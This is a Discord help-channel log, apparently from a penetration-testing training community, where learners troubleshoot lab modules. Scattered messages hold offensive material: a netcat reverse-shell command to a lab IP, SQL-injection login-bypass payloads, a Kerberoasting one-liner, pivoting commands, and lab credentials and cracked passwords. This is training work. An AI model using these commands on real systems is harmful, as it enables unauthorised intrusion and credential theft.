#modules

1 messages · Page 90 of 1

rustic sage
#

same error

surreal beacon
#

@acoustic willow anything?

vital adder
#

@rustic sage working fine for me when running klist do you see LINUX01$ ticket info?

rustic sage
#

the one we talked about before didnt work

vital adder
#

yea that isn't right shoot me a dm with your ||kinit|| command (spoiler reason)

rustic sage
#

and i literally cant find any more type keytab file

acoustic willow
vital adder
#

yeah this isn't the place for that plus you join thm discord like a month ago 2 day a part from htb discord and your account isn't verify on both side but either way this channel is for HTB academy module

shadow current
#

ok

balmy saffron
#

Hello,
In attack common services - FTP, the ftp service does not show up since yesterday despite restarting the target.
┌─[us-academy-1]─[10.10.14.68]─[htb-ac-746322@htb-epoa3o85ku]─[~]
└──╼ [★]$ nmap 10.129.168.77 -sC -sV -p2121,21
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-09 15:54 BST
Nmap scan report for 10.129.168.77
Host is up (0.0037s latency).

PORT STATE SERVICE VERSION
21/tcp closed ftp
2121/tcp closed ccproxy-ftp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

vital adder
#

reset the target machine a few time if that doesn't fix the issue contact support (this is a known bug)

balmy saffron
#

thx

potent nebula
#

daniel@MARKUP C:\Log-Management>C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.9 1234
This version of C:\Log-Management\nc64.exe is not compatible with the version of Windows you're running. Check your computer's system information and th
en contact the software publisher.
iam download nc.exe in not result
help me

vital adder
autumn pilot
#

starting point -> markup

potent nebula
#

sorry

surreal beacon
potent nebula
#

yes

surreal beacon
#

im really stuck for days

#

thanks.

potent nebula
#

starting point -> markup

autumn pilot
vital adder
#

this channel is for HTB academy

surreal beacon
#

@autumn pilot why?

autumn pilot
#

because it will not help you understand the topic

surreal beacon
#

i want hints anyways

#

i did understand it

autumn pilot
#

well you ask for steps, not hints

surreal beacon
#

same thing

autumn pilot
#

not quite

surreal beacon
#

most likely

vital adder
autumn pilot
#

you will benefit more of trying to build a question on X and Y thing, an try to provide some steps that you've done so far without providing any spoilers

misty current
autumn pilot
#

attempting and pushing yourself to ask the appropriate question benefits you more than anyone else

analog dock
#

How do you guys take notes? I’m very used to just remembering things and knowing where to find them again, but I’m always impressed by the notes some people take. I think it would be a good time saver for me

vital adder
#

if you are asking about the program then personally i use obsidian

analog dock
#

I saw obsidian was recommended and I downloaded it yeah, but do you guys use templates or something? Or just put in stuff as you go

misty current
#

I'm new to note-taking too, I'd say find your own style. Make a lot of mistakes, observe and revamp your notes. when a template style clicks for you and stick with it.

#

I built my notes based on Academy modules and everytime I use it for an assessment or boxes, I kinda re-arrange/delete/add things to make it easier to find.

analog dock
#

I guess I could make notes per port/service

vital adder
#

for the note i would say it's more about on the personally side of each people but this is a snippet of how i noted boxs in offshore

sussy_my_note.png
analog dock
vital adder
#

yeah don't take it from me i'm new to good note taking too 😅 and i do remember tcm have some video on note taking a while back and they i think did have a note taking app ranking or something like that sometime ago so maybe give that a try

analog dock
vital adder
analog dock
#

Will probably spend a couple of days to set up everything. enumeration per port, privesc, cheatsheets etc

#

And then will look for some template for box/environment reports

vital adder
#

the worst thing is if you forgot to note anything down after like god know how many step of hacking a lab and you and to write your "good note" from the dump file you call note 🤣 (talking from experience)

autumn pilot
vital wedge
#

hi

gentle root
autumn pilot
#

greenshot I guess

surreal beacon
#

im tired of this

acoustic owl
surreal beacon
#

Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.

acoustic owl
surreal beacon
#

i did

#

@acoustic owl

#

but idk what commands to execute

#

im also logged in

#

im legit lost

acoustic owl
surreal beacon
#

hint is easier i tried everything

acoustic owl
naive field
acoustic owl
acoustic owl
grim sierra
#

Could I please get a nudge on the "INFORMATION GATHERING - WEB EDITION" model?

#

I have the answer but am having an issue recovering the flag. (Or im wrong, lol)

acoustic owl
grim sierra
acoustic owl
#

You are logged in in MS01?
|| Inveigh.exe || will be your friend

blazing crypt
#

Ah darn, how did I not check that...

acoustic owl
#

A very general tip.
BloodHound is really great, but it doesn't help in every situation

Think of it as a tool, not an all-purpose magic bullet

zinc marsh
#

is there anyway to fix xfreerdp with black screen?

#

i have been getting that error all the week while doing the ad enumeration and attacks module

acoustic owl
misty current
#

🪄

summer lava
worthy reef
#

Any had any experience with the: introduction to threat hunting & hunting with elastic module? Really struggling on the skills assessment.

vital quiver
#

tip for module Footprinting - IMAP/POP3, if stuck on last 2 questions install evolution

zinc marsh
worthy reef
#

Would you be able to give any pointers on the second hunt in the skills assessment?

#

@zinc marsh

rustic sage
rustic sage
misty current
#

did you try just with ''

rustic sage
sweet relic
#

i have problem with machine cause doesnt react even on ping

solar zodiac
#

Hi everyone! Has anyone done the kerberos attacks module? I can't get the impacket-getST command to work... was wondering if anyone could help

autumn pilot
#

which section

solar zodiac
#

the linux rbcd section

#

not sure what im doing wrong

#

im getting a KRB_AP_ERR_BADMATCH error

autumn pilot
#

try to use the one from impacket/examples

#

and see if it will make any difference

solar zodiac
#

im still getting the errror

#

copy/pasting the command from academy

worthy reef
#

ughh

#

one task is stopping me smh

keen compass
#

Hi all, on PASSWORD ATTACKS > Protected Files
Question : Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
Am I supposed to have previously crack this account ?

solar zodiac
#

strange.. when i opened a new bash terminal it worked

#

the exact same command

#

im a whole different level of confused now

#

lol

keen compass
#

do you still have the "non working terminal" ? if so, you might compare env vars that are set (especially if there is a KRB5CCNAME set)

solar zodiac
#

yeah so I used kdestroy

sweet relic
#

i have problem with machines cause i cant connect to any

solar zodiac
#

and it still tried to use my ccache file

#

although I didnt specify -k

sweet relic
#

openvpn is on

keen compass
sweet relic
#

problem is otherwise

solar zodiac
sweet relic
#

cause i try from included terminal

#

and still not work

solar zodiac
#

yeah I think it was just trying to use a ccache file

sweet relic
#

wrote to support already but no respond

solar zodiac
#

from the terminal

#

although I didnt type -k

keen compass
#

I don't use the included term but I think it relies on the Pwn box. Each time the pwnbox is up, you can't use your VM's VPN.

keen compass
keen compass
# sweet relic problem is otherwise

even if the VPN is up there might be some other stuff preventing you to access the VM.
Please try this :

  • stop the pwnbox
  • download a new VPN connection profile
  • start the VPN from your VM
  • try to ping the target
#

if that doesn't work, try this :

  • stop the VPN from your VM
  • start the pwnbox
  • try to ping the target
#

if that still doesn't work :

  • respawn the target and try again all the previous steps
#

if still nothing : complain to HTB staff 😉

#

(I would even say you may first try all this using the pwnbox. When it will work on the pwnbox, try to make it work on your own machine

sweet relic
keen compass
lost rivet
#

Hello

#

I had a question I need help with

#

What Hashing protocol is capable of symmetric and asymmetric cryptography?

keen compass
#

we don't talke about hashing protocol but algorithm

barren sedge
#

just a quick question am I the only person having trouble getting onto HTB?

keen compass
lost rivet
lost rivet
keen compass
#

they use the term "hashing protocol" ?

lost rivet
#

Sorry didn’t get what u said

barren sedge
#

I just cant even login to htb

rustic sage
barren sedge
#

I have been logging into the wrong fucking thing for far too long im soooo mad rn

zinc marsh
#

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

#

what is the -B12 used for?

keen compass
keen compass
sweet relic
#

let me check

#

tried a lot of resets of target machine

#

but target doesnt respond

#

at all

#

but i checked different module

#

and works perfectly

#

i cant continue this one module cause servers wont work

zinc marsh
#

someone could give me a hint to dump the hash

#

i tried to upload mimikatz/rubeus
And i also tried to move the sam file to the attacker machine with smbserver

#

wait i think i got it

spiral spoke
#

Hello! How did you realize that it was 'http-enum' ? Is there in a catergory of the NSE? Because http-enum it is not showed in the module 🤔

zinc marsh
#

I really need the hint i dumped the sam and there is not user called bross

zinc marsh
spiral spoke
# zinc marsh https://nmap.org/search/?q=http

Yeah, but I mean, in the Module 'Nmap Script Engine' of Networking Enumeration with Nmap, it is not 'http-enum' but there is the categories of NSE, using for example --script banner, vuln, etc: categories, but 'http-enum' is something more especific that is no inside this module but you need it to get the flag 😅

zinc marsh
#

The scripts used for the last scan interact with the webserver and its web application to find out more information about their versions and check various databases to see if there are known vulnerabilities. More information about NSE scripts and the corresponding categories we can find at: https://nmap.org/nsedoc/index.html

#

that is written in the section

spiral spoke
#

Oh, I hadn't noticed this little part RPOGGERS

#

Thank you!

zinc marsh
tough coyote
#

Goodeveing

winged rune
#

Hi

zinc marsh
red current
#

I've been stuck on this section in Attacking Common Applications for days now. I don't get it at all. I'm on the Attacking WordPress section and I can't even find a single name with the wpscan tool. I've tried several different word and name lists and I come up empty whether I'm using wp-login or xmlrpc. Does anyone here have a hint they can give me or provide some guidance on what I might be doing wrong? I'm using the tool just as it's suggested in the section.

#

Never mind. I didn't realize that it meant to run the wpscan from the previous section on enumerating WordPress! Derp!

zinc marsh
# 
Get file flag.txt? y
Error opening local file flag.txt
smb: \Users\Administrator\Desktop\>```
#

why am i getting this error if im admin?

zinc marsh
#

forgot the destination

dusky vale
#

28

karmic wren
#

Why I can not get the lsass.dmp in powershell attacking lsass.

fickle thicket
#

The Linux file system is based on the Unix file system, which is a hierarchical structure that is composed of various components. At the top of this structure is the inode table, the basis for the entire file system. The inode table is a table of information associated with each file and directory on a Linux system. Inodes contain metadata about the file or directory, such as its permissions, size, type, owner, and so on. The inode table is like a database of information about every file and directory on a Linux system, allowing the operating system to quickly access and manage files. Files can be stored in the Linux file system in one of two ways:

Regular files
Directories

fickle thicket
acoustic owl
fickle thicket
#

so above the root is the inode table?

acoustic owl
# fickle thicket so above the root is the inode table?

https://www.youtube.com/watch?v=_6VJ8WfWI4k

YouTube
theurbanpenguin
Understanding Linux and UNIX inodes and file metadata

Do you need a greater understanding of Linux inodes and file metadata?
Here we take a tour to make sure that we do truly understand inodes in Linux and what they do and contain. Firstly they do not contain the file name. This is stored separately and the file name is linked via the inode number to the inode. The inode itself contains the metadat...

▶ Play video
vital zephyr
#

hi all guys, can you explain to me what happened? since yesterday when I tried to connect via openvpn from the laptop it doesn't let me connect from any other device, yet I always use the usual command sudo openvpn -openvfile-

acoustic owl
#

Download the VPN file again
Do you have the PwnBox open? If yes, this may cause problems

vital zephyr
#

I don't have pwnbox open, I use kali

#

kali give me an output like this: time 20, restart 20

acoustic owl
#

Show me a Printscreen

fickle thicket
#

does permission and privilege have the same meaning or are they different?

acoustic owl
fickle thicket
#

can you explain? they seem similar but i cannot tell the difference

acoustic owl
surreal beacon
#

How can i copy things to pwnbox?

#

No paste

acoustic owl
clever crow
#

Im currently doing the knowledge check of getting started but the webpage is very slow and i cant work with it like this. Any ideas to fix this? Btw Ive already restarted the target

rustic sage
misty current
#

It's hard to tell, as I can't remember the code behind that assessment. Can you show me the sql error for that?

obsidian blaze
#

yep in few sec

misty current
obsidian blaze
#

the good one

rustic sage
misty current
#

Also, you might want to mask/hide the answers, so you don't spoil anyone reading this channel.

obsidian blaze
#

oh shit

#

yes

misty current
obsidian blaze
#

||the good one
Executing query: SELECT * FROM logins WHERE username='1' = '1' or '1' = '1'-- -' AND password = '';

Login successful as user: admin||

rustic sage
obsidian blaze
#

||bad one
Executing query: SELECT * FROM logins WHERE username='1'='1'-- -' AND password = '';

Login failed!||

misty current
#

@obsidian blaze From my understanding
The bad one fails because, it checks for a username with multiple logical operators and just ultimately results FALSE which ends up failing.
Like even if you gave ||SELECT * FROM logins WHERE username='1'-- -' AND password = '';|| It just checks for a username 1 and if the database doesn't hold that value, it returns FALSE, which is again a fail to login

The good one, takes the case where, no matter what result you get from username=<logic/value>, regardless true or false. It'll check with the logical operator on the other end of the OR statement '1'='1' which is always true. so ultimately just for || username='1' = '1' or '1' = '1' || it's either gonna be (FALSE OR TRUE) or (TRUE OR TRUE), either way, you always get true.

Even this payload should work ||1' or '1' = '1'-- -|| this one might give you some understanding to what I said.

#

Mask this one too.

keen compass
#

Hi, am on : https://academy.hackthebox.com/module/147/section/1322 (Password Attacks > Protected Files)
The question is : Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

What I have tried :

  • try to find kira's password through the FTP service password attack (using mutated_password_list, using rockyou)
  • try to do some password reuse (using the cracked notes.zip file found in kira's home directory from the previously compromised sam username)
  • try to find anything else to loot from the sam account that might help me find kira 's password.

Could someone give me a small hint please ?

HTB Academy : Cybersecurity Training

Login to HTB Academy and continue levelling up your cybsersecurity skills.

rustic sage
keen compass
rustic sage
#

guess so

misty current
#

but it's better than having one username going through all the passwords, something like that perspective

misty current
keen compass
zinc marsh
rose furnace
#

help

#

i forgot how to open a file on windows

#

Find the user for the SSH service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

#

ive got access to the account

#

and i found the flag location

zinc marsh
zinc marsh
misty current
rose furnace
#

nothing comes up

#

just blank

rose furnace
#

so i found the username and password and then i found the location but when i try opening the flag.txt document there is nothing in it

zinc marsh
#

i mean the command is just type

rose furnace
#

oh

#

thank you

rustic sage
zinc marsh
misty current
misty current
zinc marsh
#

always start with the "shortest --> longer" wordlists

full terrace
#

Hi im still stuck in the documentation report part of the cpts training. Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.) . i answerd ctrl + b + % it doesnt work can anyone can help me pls ?

obsidian blaze
#

like in the course

misty current
zinc marsh
#

@misty current have u done the AD enumeration & attacks module?

misty current
#

But, yeah I've done the rest.

pine dagger
#

AD Enumeration is probably the hardest module out of all of them 😄

weary stump
#

someone could help Xuy plz ?

cursive zinc
#

Hi everyone, I'm on the Login brute forcing --> skill assesement-website question 1 part I launched an operation that has already taken more than 30 minutes without success

#

Does anyone have an idea of ​​the database I should use in this part?

pine dagger
weary stump
#

I need the answer too

pine dagger
#

And, the order matters, and every key needs square brackets around it.

autumn pilot
keen compass
# zinc marsh just reuse them and crack the id_rsa

when you say 'reuse them', you mean reuse previously found password from the same Target (using initial foothold with the sam account ? because there is ||B@tm@n2022!||, ||P@ssw0rd3!|| from the zip file and that's all I had.
I also have the root password ||J0rd@n5|| but I don't remember about will passwords (I didn't took notes 😦 ).
I remember having to use the hint to find the password but since I finished this section, the hint button seems to have deseapeared ...

zinc marsh
full terrace
autumn pilot
#

well, everything you need to solve the question is right infront of you, plus the question is based on the material in the section

#

don't overcomplicate it, and read the question again and you will notice the difference

zinc marsh
zinc marsh
#

to ssh

misty current
zinc marsh
keen compass
zinc marsh
#

am using the web shell

misty current
#

I think you can too, with administrator prompt. I'm just not sure.
Also, by not working, you mean you were not able to get the hashes right?

zinc marsh
misty current
#

Oh, your access is a webshell?

pine dagger
#

I'm not sure how to help you shockp without giving you the answer. 😦

full terrace
#

thanks

zinc marsh
#

also doing it manually i get an error when i run this New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"

misty current
#

how you tried running it might be the problem here then.

zinc marsh
#

should i get a reverse shell?

pine dagger
#

Maybe by saying ||one of those tools does work, but you should use a recently acquired user instead||

zinc marsh
zinc marsh
misty current
distant lodge
#

Hi all, stuck on the footprinting module, easy lab: when trying to connect to ssh I am getting a network unreachable message in the VPN log and the connection is closed. I have reset the target as well as reestablished connection to the VPN, successfully got and set permissions to the ssh keys, can scan p22 which returns open but stuck on the actual connection. Can anyone give me a nudge?

keen compass
keen compass
distant lodge
#

@keen compass I have not - will try that now

pine dagger
misty current
#

There's no necessasity for a web shell there hmmm

#

Maybe wrong module link?

pine dagger
#

Huh?

#

I'm talking about the link that shockp linked

#

No web-shell. Just straight RDP.

misty current
misty current
distant lodge
#

@keen compass thanks for the help - worked and lab completed.

keen compass
distant lodge
#

@keen compass yeah I realized that right after I connected and ftp stopped working, good times 😂

zinc marsh
#

A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.

misty current
#

You shared the wrong module link.

#

At the start

zinc marsh
pine dagger
#

lol

#

Wait

zinc marsh
pine dagger
#

you're asking about the Skill Assessment?

#

Now this makes more sense why you asked about DA

zinc marsh
pine dagger
#

Still Q2?

zinc marsh
zinc marsh
pine dagger
#

No additional tools required then

zinc marsh
#

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"

pine dagger
#

Try using a ||lolbin tool||.

zinc marsh
#

i get an error with this command doing it manually

pine dagger
#

Try with a different account

#

🙂

#

Or try the "All Tickets" method

surreal beacon
keen compass
surreal beacon
#

the password is my problem

zinc marsh
surreal beacon
#

i have found the hash

#

i just couldnt be able to crack it via john

zinc marsh
#

all what i try doesnt work lol

surreal beacon
#

i obviously used msfconsole with output john

cursive zinc
#

I made a brute force on a web page I get username and password but when I use them it does not work

zinc marsh
#

i dont know use metasploit to crack hashes

#

i always use hashcat or john

surreal beacon
#

it says could not idnetify

zinc marsh
#

what is the hash

surreal beacon
#

I'll send the original one

pine dagger
#

Really?

#

I just stuck it in a text file and did "john file.txt"

surreal beacon
#

u did?

#

@zinc marsh

#

did u copy it?

pine dagger
#

You probably should remove that

surreal beacon
#

wolf

#

have u figured it out?

pine dagger
#

?

surreal beacon
#

the has

#

hash

#

**

zinc marsh
pine dagger
#

I finished Footprinting months ago

surreal beacon
#

got it?

surreal beacon
pine dagger
#

I'm working through HTTP Attacks, lol

zinc marsh
#

i just searched it in the hash identifier

#

and it works

surreal beacon
#

i didnt try this one

#

i told u its the original one

#

not the john format

#

hash

#

@zinc marsh sha1?

zinc marsh
#

Add-Type -AssemblyName System.IdentityModel
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

#

@pine dagger am i doing something wrong?

pine dagger
#

If its copied from the example, its probably right

#

Most of the questions from the AD Enumeration are solvable with the correct commands from the earlier chapters

zinc marsh
zinc marsh
#

and i get error lol u did it with the web shell?

pine dagger
#

no. Meterpreter

dull vortex
#

How long should I give hashcat to crack the bitlocker file in the Password attacks hard lab, before moving to a new list? I am using rockyou first.

zinc marsh
zinc marsh
dull vortex
#

I feel like its going to be the mutated list but didn't want to leave rockyou til last in case since it was the example

zinc marsh
#

@pine dagger i needed to do it with a reverse shell

#

and do it interactive

zinc marsh
marble kraken
#

Module: Windows Fundamentals
Problem: Connecting via rdp (xfreerdp or rdesktop linux cli to HTB VPS)

Alright. So two days have passed, I had other things to do in between. A Simple task which should take 5 minutes still hasn't been accomplished:

# 
└──╼ [★]$ xfreerdp /v:10.129.58.106  /u:htb_student /p:'Academy_WinFun!'[16:17:53:533] [2593:2594] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[16:17:53:533] [2593:2594] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[16:17:56:610] [2593:2594] [ERROR][com.freerdp.core] - freerdp_post_connect failed```
#

And yes, I have tried wrapping arguments in all kinds of single or double quotes.

#

This last is from pwnbox

keen compass
marble kraken
#

no

proud pine
marble kraken
#

well ill try from pwnbox

keen compass
marble kraken
#

nope from pwnbox also not. But i figured maybe Frames dropped by Firewall

keen compass
#

try to spawn another Target (from some other module) one person had similar issue yesterday related to a specific module

#

just to be sure this is not an HtB "bug" due to some cloud instance being not working properly

marble kraken
vagrant gust
#

getting access denied when i try to move the sam files on smb

keen compass
vagrant gust
#

this is for attacking SAM on password attacks

marble kraken
#

Usually they are pingable, right? afaik

keen compass
#

this is why I ask you to first just ping them, that will confirm the VPN works and potential filtering is set properly

marble kraken
#

cause they never were in this module/case

#

ok ill reset all first

keen compass
#

umm I havn't done this module. it is not part of CPTS path ?

surreal beacon
#

rebrec

#

see ur priv

keen compass
zinc marsh
#

someone could help me with chisel?

vagrant gust
zinc marsh
#

i dont get it works in the target machine

vagrant gust
#

however when i run the command to move it the server i get access is denied

keen compass
keen compass
keen compass
keen compass
vagrant gust
vagrant gust
keen compass
# vagrant gust

please, try to stop smbserver, then cd .., then start again smbserver and retry

vagrant gust
vagrant gust
#

sorry to waste ur time

zinc marsh
#

@keen compass ./chisel server --reverse -v -p 1234 --socks5

#

.\chisel client -v IP:1234 R:socks

keen compass
keen compass
vagrant gust
zinc marsh
#

but i cannot connect with the client

#

do i need to gie rights or something? in the target machine

keen compass
# zinc marsh yea

so you don't need the --socks5 (on the server) but anyways this is not your problem.
are you sure to have exact same version on client and server ?
what does the server says (if errors)
what does the clients says ?

keen compass
keen compass
zinc marsh
#

i am with a reverse shell so i cannot see the error

keen compass
zinc marsh
surreal beacon
#

@keen compass

zinc marsh
#

PS C:\Users\Administrator\Desktop\chisel\chisel> .\chisel client -v *:1234 R:socks

marble kraken
#

Hm. alright. regarding my xfreerdp connect from Pawnbox: still shows similar connect-info (self.sign cert. etc.) , but this time it worked and gave me an RDP Window

#

So., somehow it works now 👍

keen compass
# zinc marsh windows

there might be a Windows Firewall running on this box preventing outgoing connections ?

keen compass
#

which box is it ?

keen compass
zinc marsh
keen compass
# zinc marsh Active directory enumeration & attacks - skills assessment part 1

oh, I am not that far, I won't be able to give much help, at least, if you cannot see the output from the client I may suggest a few things :

  • check if outgoing connections are allowed (run a tcpdump on your attack box, then either use Invoke-WebRequest, nc, whatever on remote host
  • if chisel is not running you may try to generate an meterpretter agent (I don't like it, but it may ease the discovery of the remote host, and even provide tooling to setup a tunnel)
proud pine
ashen shard
#

Hey guys, can anyone help me with 'Abusing HTTP Misconfigurations - Skills Assessment 1'? I just need a hint haha

rustic sage
#

Why does crackmapexec think that every credentials are correct? How can i fix this? I'm trying to crack the SMB account and dump the hashes.

image.png
zinc marsh
proud pine
zinc marsh
#

ty i will try it

fathom pendant
keen compass
proud pine
keen compass
#

can you do multiple tunnels at the same time as chisel offer ?

#

@proud pine

proud pine
#

Not sure? Haven't had the need.

keen compass
#

ok, recently I pivoted using chisel both doint :

  • a reverse socks to have access to the whole LAN
  • a standard UDP port forwarding to expose the DC's NTP server to my attack box to time sync
#

anyway I will try your tool, it's always useful to have multiples in your pocket. Thanks for sharing

proud pine
#

Socks/reverse socks both definitely work.

#

I like it for the simplicity.

zinc marsh
#

bryh i broke the revshell by eroor

#

and now i cannot get it back -.-

fathom pendant
#

Nice

keen compass
#

yep, I understand, might be quickly usable through evil-winrm, and could even not touch the filesystem which is cool too

fathom pendant
#

Classic

keen compass
zinc marsh
# 
Import-Module .\Invoke-SocksProxy.psm1
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130 

# Go through the system proxy:
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130 -useSystemProxy

# Validate certificate
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130 -certFingerprint '93061FDB30D69A435ACF96430744C5CC5473D44E'

# Give up after a number of failed connections to the handler:
Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 192.168.49.130 -maxRetries 10```
#

@proud pine all this is with the ip where i want to connect?

#

the 192.168.49.130

proud pine
#

Are you trying to do reverse? I think in your chisel example, you were just trying to set up socks, right?

zinc marsh
#

i want to make a tunnel to login with proxychains xfreerdp

#

to 172.16.x.y

proud pine
#

For that, it sounds like you just want the basic
Invoke-SocksProxy -bindPort (port)

zinc marsh
#

and with the ReverseSocksProxyHandler.py

zinc marsh
proud pine
#

DM me, so we can discuss more easily without spamming

cursive zinc
#

Need some help

keen compass
zinc marsh
#

I have been 4 hours stuck here and i am not able to login to ms01

wheat basin
#

Hello Team!
Looking for some help in the section User and Group Management inside of Intro to the Windows Command line (linked below).

https://academy.hackthebox.com/module/167/section/1618

I'm looking for some help on:search for a domain user with the given name of Robert. What is this users Surname?
I swear I have been up and down over this article multiple times, tested at least 20 different ways and still unable to solve this. After some googling and chatGPT I'm still not able to solve this.

Help woudl be appriciated 🙂

HTB Academy : Cybersecurity Training

Login to HTB Academy and continue levelling up your cybsersecurity skills.

cursive zinc
#

Somebody can help me on this section ?

keen compass
cursive zinc
#

Section Skills Assessment website

#

I found the first username and password allowing me to access the next page, when I still run the brute forcing operation on this last one, I get several username and password

#

Which however does not work

#

I did

#

Hydra -l user -P password.txt Ip port http-post-form" admin_login......."

blazing crypt
#

Windows Privilege Escalation

Kernel Exploits

I exploited || PrintNightmare || and have a user added that is an administrator. I got a shell as this user, however I can't get the flag from the administrator? Does anyone know what I can do to really become and admin? 🤔

image.png
red current
#

Does anyone have any hints they can give on getting the flag in the Attacking WordPress section in Attacking Common Applications?

misty current
#

It'll be really great if someone can point out what that is NotLikeThis

zinc marsh
#

i dont know the domains

blazing crypt
blazing crypt
zinc marsh
#

cant u dump the hash for the administrator?

#

maybe winpeas finds something interesting to privesc

red current
#

I've tried using Metasploit with the usernames and password I have and tried using wp_discuz to find the flag. None of these have worked. Wp_discuz does appear to give me a shell based on the output I get, but I can't appear to do anything with it. None of my bash commands work to do any kind of enumeration. Does anyone have a hint or clue as to what I might be doing wrong?

#

I either get a no such job error or a 404 Not Found error.

fiery berry
blazing crypt
#

I think it's the UAC blocking us.

fiery berry
#

exactly

blazing crypt
#

But I've been trying to bypass it for ages now, not sure if it's even possible haha

fiery berry
#

I haven't tested it personally but should be able to accomplish what we want

blazing crypt
#

With it's --bypass-uac flag!

#

Oh that is so lovely. Works like a charm

#

Love it!

red current
#

I'm using locate to find the flag and for some reason it thinks "locate" is part of what I'm searching for. Has anyone seen that before? I've tried using + and %2B to enter my bash script but it just isn't working.

summer lava
red current
#

Nice! @summer lava

#

So, could someone tell me what I'm doing wrong here in trying to get the flag in the Attacking WordPress section in Attacking Common Applications?

#

Is there some other tool I should be using besides Metasploit or wp_discuz.py? Like I said, it looks like wp_discuz gives me a shell, but none of the commands I use in that shell work. It's like its just a stuck page without any actual access.

misty current
#

I don't remember this but have you tried searching for sensitive files around the site?

red current
#

I can't even change directories.

summer lava
red current
zinc marsh
#

please someone can help me for the 4th question

#

i have been stuck for 5 hours

acoustic owl
zinc marsh
#

i cannot connect to ms01

acoustic owl
misty current
#

What access do you have, so far?

zinc marsh
zinc marsh
misty current
#

Would help us better to help you lol

zinc marsh
#

Pingsweep, arp -a, ipconfig,ipconfig /all, all the commands with get-domain, proxychains (nmap, crackmapexec, mssql...)

#

i tried to get it through extrasid

#

as well

misty current
#

Yup, you haven't tried it all. You're missing something important.

#

It's the go-to method as soon as you get domain creds

zinc marsh
#

just hit enter

little bear
#

LOL

misty current
#

Enter 🪄

zinc marsh
little bear
#

mood

zinc marsh
#

i need rest

misty current
#

Yeah, that's the solution sometimes lol

zinc marsh
#

i dont even know what is the go-to method lol

misty current
#

It's something that'll give you creds, that's your hint 🙃

zinc marsh
#

i have the creds

misty current
#

other creds

zinc marsh
#

time for lazagne lol

#

or just dump the sam lol

misty current
#

Nah, hunt for the three headed dog.

zinc marsh
#

well time for rubeus then lol

vital horizon
#

Hi guys,
Any hint on last flag of Linux Provilege last flag please? I’ve been trying to explore the command that has setuid

acoustic sparrow
#

DM pls

summer lava
rustic sage
#

Hello.

misty current
#

I'm domain admin, so why am I not able to delete this reg key?
I'm currently doing the DnsAdmins Section in Windows PE

image.png
acoustic owl
misty current
#

Ah, a log out and log in does the trick? I thought closing the shell session would do the trick but that didn't do so i started to wonder what was happening.

#

Thanks for the explanation.

snow lion
misty current
#

It's powershell

snow lion
#

What are you doing?

misty current
#

Abusing DnsAdmins Group privileges by loading DLL's, everytime you do this, it kinda breaks the DNS service so you've gotta reset stuff to perform the attack again or make the DNS service work properly.

snow lion
#

Are you trying to fix the DNS?

misty current
#

In this case, I'm trying to re-execute the attack with a different payload.

snow lion
#

But, what is this "attack"?

#

What were the camand to do this? How do you load this DLL?

misty current
snow lion
#

Ok.

#

What is the best Linux distribution to crytogtaph and hack?

snow lion
acoustic sparrow
#

got it

velvet leaf
#

Hello everybody I am stuck in the Nibbles machine

buoyant escarp
#

In Linux Privilege Escalation Assessment, im on Tomcat Service, successfully Authenticated, now im in host-manager and manager page, but what should i do from now on ?!

rustic sage
velvet leaf
#

Anybody experience with the nibbles machine?

#

when I put up a reverse shell and try to download it is stuck at 0% transfer

#

it sees my http server and sees the files size

#

but it wont transfer

pine dagger
winged shore
pine dagger
#

It is a box, that is also used in HTB Academy. They didn't say they were doing Getting Started.

summer lava
rustic sage
keen compass
#

hi

#

I am on the road to root too

keen compass
rustic sage
keen compass
#

did you pivot ?

rustic sage
#

no, how would i do that?

keen compass
#

there is another user

#

i mean lateral movement

rustic sage
#

dennis?

keen compass
#

yep

rustic sage
#

hmmm i mean i searched all possible interesting config and other files

#

there is no kerberos or anything in place

keen compass
#

I didn't found any interesting config

#

indeed

#

but you can easily get dennis password

#

read again the docx

rustic sage
#

brute force?

keen compass
#

no

rustic sage
#

ohh right

keen compass
#

GL

#

I am just after this step so don't tease me if you reach that step 😉

rustic sage
#

ohh 🙂 well i didn't find anything in the docx? the root password didnt work and i cant seem to find the mentioned settings file anywhere

#

and i can't access dennis' directory

keen compass
#

the docx provide credentials to some specific service

rustic sage
#

mysql?

keen compass
#

you reused thoses credential to ssh into the server but initially the docx was talking about a service

rustic sage
#

hmmm the website?

keen compass
#

instead of asking, just try what you are talking about

#

